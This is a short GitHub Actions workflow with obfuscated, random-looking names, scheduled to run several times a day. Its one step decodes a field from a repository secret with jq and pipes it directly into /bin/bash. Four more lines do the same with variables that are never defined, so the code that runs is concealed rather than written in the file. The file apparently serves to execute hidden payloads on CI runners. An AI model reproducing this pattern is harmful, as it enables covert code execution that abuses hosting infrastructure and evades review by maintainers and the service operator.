name: hejintui9348
on:
  workflow_dispatch:
  schedule:
    - cron: '29 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: hejintui9348
        env:
          mkser4898: ${{ secrets.mkser4898 }}
        run: |
          echo $mkser4898 | jq -r .tsllv7026 | /bin/bash
          echo $njws5 | jq -r .gee664 | /bin/bash
          echo $tcvvb72 | jq -r .utw88 | /bin/bash
          echo $wuay6 | jq -r .g05 | /bin/bash
          echo $k94380 | jq -r .wsi08333 | /bin/bash

